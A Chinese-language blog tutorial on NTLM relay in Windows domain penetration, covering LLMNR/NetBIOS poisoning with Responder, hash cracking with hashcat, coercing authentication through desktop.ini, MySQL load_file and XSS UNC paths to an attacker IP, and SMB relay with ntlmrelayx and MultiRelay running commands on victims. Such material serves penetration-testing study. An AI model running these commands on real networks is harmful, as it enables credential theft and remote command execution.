域渗透之NTLM Relay

域渗透之NTLMRelay基础知识LLMNR概述链路本地多播名称解析(LLMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之NTLM Relay

基础知识

LLMNR概述

链路本地多播名称解析LLMNR)是一个基于协议的域名系统(DNS)数据包的格式,使得双方的IPv4和IPv6的主机来执行名称解析为同一本地链路上的主机。当局域网中的DNS服务器不可用时,DNS客户端会使用LLMNR本地链路多播名称解析来解析本地网段上的主机的名称,直到网络连接恢复正常为止。

LLMNR工作过程

当一台主机想要访问到另一台主机时,主机在自己的内部名称缓存中查询名称,如果在缓存中没有找到名称,那么主机就会向自己配置的DNS服务器发送查询请求,如果主机没有收到回应或收到了错误信息,即DNS解析会失败,那么就会转为使用LLMNR链路本地多播名称解析。

使用链路本地多播名称解析时,主机会通过 UDP 向局域网内发送多播查询,查询主机名对应的IP,查询范围被限制在本地子网内。本地子网内每台支持LLMNR的主机在收到这个查询请求后,收到该请求的主机会判断自己的主机名是不是这个查询的主机名。如果是,这台主机会回复自己IP地址给请求该查询的主机;如果不是则丢弃该请求。

解析顺序

  1. 本地hosts文件(%windir%\System32\drivers\etc\hosts)

  2. DNS缓存/DNS服务器

  3. 链路本地多播名称解析(LLMNR)和NetBIOS名称服务(NBT-NS)

LLMNR和NetBIOS欺骗攻击

攻击原理

我们利用SMB协议获取目标网络中计算机的Net-NTML Hash。

当用户输入 不存在、包含错误 或者 DNS中没有的主机名 时,主机先在自己的内部名称缓存中查询名称,如果没找到,主机就会向DNS服务器查询,而DNS解析会失败,此时就会退回LLMNR和NetBIOS进行对链路内存在的主机进行广播查询。那么攻击者就能够代替网络上任何不存在的主机回答请求,并诱导搜索内容的主机连接到我们。如果攻击者使用 Responder 等工具,就可以要求验证受害者主机的身份,而如果攻击者被认为是这些主机所在的本地网络中的一部分时,他们就会把自己进行哈希后的Windows凭据发给攻击者。

Responder概述

Responder是监听LLMNR和NetBIOS协议的工具之一,能够抓取网络中所有的LLMNR和NetBIOS请求并进行响应,获取最初的账户凭证。

Responder会利用内置SMB认证服务器、MSSQL认证服务器、HTTP认证服务器、HTTPS认证服务器、LDAP认证服务器,DNS服务器、WPAD代理服务器,以及FTP、POP3、IMAP、SMTP等服务器,收集目标网络中的明文凭据,还可以通过Multi-Relay功能在目标系统中执行命令。

Responder使用

responder -I eth0 -r on -v -F on -w on 

域渗透之NTLM Relay

域渗透之NTLM Relay

主机尝试连接该地址,检查内部名称缓存和DNS都没找到,就会通过LLMNR和NetBIOS,在局域网中进行搜索。

此时就能抓到Net-NTLM Hash

Net-NTLM Hash不能作为PTH使用,但可以使用hashcat等工具爆破或进行NTLM-Relay攻击

hashcat -m 5600 hash.txt wordlists.txt --show

域渗透之NTLM Relay

NetBIOS

NetBIOS 协议进行名称解析的过程如下:

  • 检查本地 NetBIOS 缓存
  • 如果缓存中没有请求的名称且已配置了 WINS 服务器,接下来则会向 WINS 服务器发出请求
  • 如果没有配置 WINS 服务器或 WINS 服务器无响应则会向当前子网域发送广播
  • 如果发送广播后无任何主机响应则会读取本地的 lmhosts 文件

域渗透之NTLM Relay

域渗透之NTLM Relay

desktop.ini

文件夹底下都有个文件desktop.ini来指定文件夹图标之类的。默认不可见。去掉隐藏受保护的操作系统文件就可以看到.每个文件夹底下都会有,我们新建一个新的文件夹的话,如果没看到desktop.ini,可以尝试更改图标,就可以看到了。

将图标路径改成UNC路径,指向我们的服务器

域渗透之NTLM Relay

打开文件夹就会去访问UNC路径,即可获得用户的net-ntlm hash

域渗透之NTLM Relay

MySQL

select load_file('\\\2.16.100.1\\mysql');

XSS

<script src="\2.16.100.1\xss">

这种情况适用于IE和edge,其他浏览器不允许从http域跨到file域

smb Relay

python3 RunFinger.py -i 192.168.22.0/24

域渗透之NTLM Relay

目标主机没有开放smb签名,一般情况下域控默认开启smb签名,其余机器不开放

打开responder并修改responder.conf,將smb和http改为Off,里面responder的作用就是,创建一个可以被访问的虚拟路径并且模拟与其他主机进行NTLM认证,使用smbrelayx进行ntlm-relay

創建一個可以被訪問的虛擬路徑并且模擬與其他主機進行NTLM認證互動,而smbrelayx腳本進行

python3 smbrelayx.py -h 192.168.22.137 -c "whoami" 

這時候只要域內主機觸發了LLMNR協議即可,觸發方式與上免例子的觸發方式一致,即通過smb協議或者http協議訪問一個不存在的主機,

域渗透之NTLM Relay

./ntlmrelayx.py -t 受害者ip -c whoami -smb2support
./MultiRelay.py -t 受害者ip -u ALL
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/119847.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • docker 常用命令大全

    docker 常用命令大全Docker常用命令大全

  • 触发器创建删除等操作

    一、创建一个简单的触发器触发器是一种特殊的存储过程,类似于事件函数,SQLServer™允许为INSERT、UPDATE、DELETE创建触发器,即当在表中插入、更新、删除记录时,触发一个或

    2021年12月24日
  • linux jdk安装步骤(下载安装jdk)

    1.linux虚拟机需要先连接互联网2.命令行下载jdk安装包3.jdk安装包解压安装及环境配置4.直接在线安装jdk并配置运行环境。1.查看yum库中都有哪些jdk版本(暂时只发现了openjdk)[root@localhost~]#yumsearchjava|grepjdk2.选择版本,进行安装//选择1.7版本进行安装[root@localhost~]#yuminstalljava-1.7.0-openjdk[root@localhost~]#yumins

  • Eclipse改成中文版本「建议收藏」

    Eclipse版本:Neon参考链接:http://www.eclipse.org/babel/downloads.php如果安装完成后,同时保留英文,只需要在快捷方式后添加图片中内容:网页上的详细信息:InstallingthelanguagepacksOpentheinstallwizardwith’Help’>’

  • risc系统服务器,RISC架构三款处理器

    risc系统服务器,RISC架构三款处理器富士通在去年8月份的HotChips24大会上发布了其Sparc架构的16核处理器Sparc64-X,与此同时,甲骨文也发布了同样为Sparc架构的16核心处理器SparcT5,IBM的Power7+也是在此次大会上发布的。HotChips24三款CPU主题演讲IBM的Power7+采用的32nm支持工艺,8核心,最高主频超过5GHz,已经在IBM大型机ZzEnterpriseEC1…

    2022年10月22日
  • oracle索引视图_位图联合索引

    oracle索引视图_位图联合索引一.什么是位图索引我们目前大量使用的索引一般主要是B*Tree索引,在索引结构中存储着键值和键值的RowID,并且是一一对应的.而位图索引主要针对大量相同值的列而创建(例如:类别,操作员,部门ID,库房ID等),索引块的一个索引行中存储键值和起止Rowid,以及这些键值的位置编码,位置编码中的每一位表示键值对应的数据行的有无.一个位图索引块可能指向的是几十甚至成百上千行数据的位置.这种方式存储数据…

    2022年10月26日

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号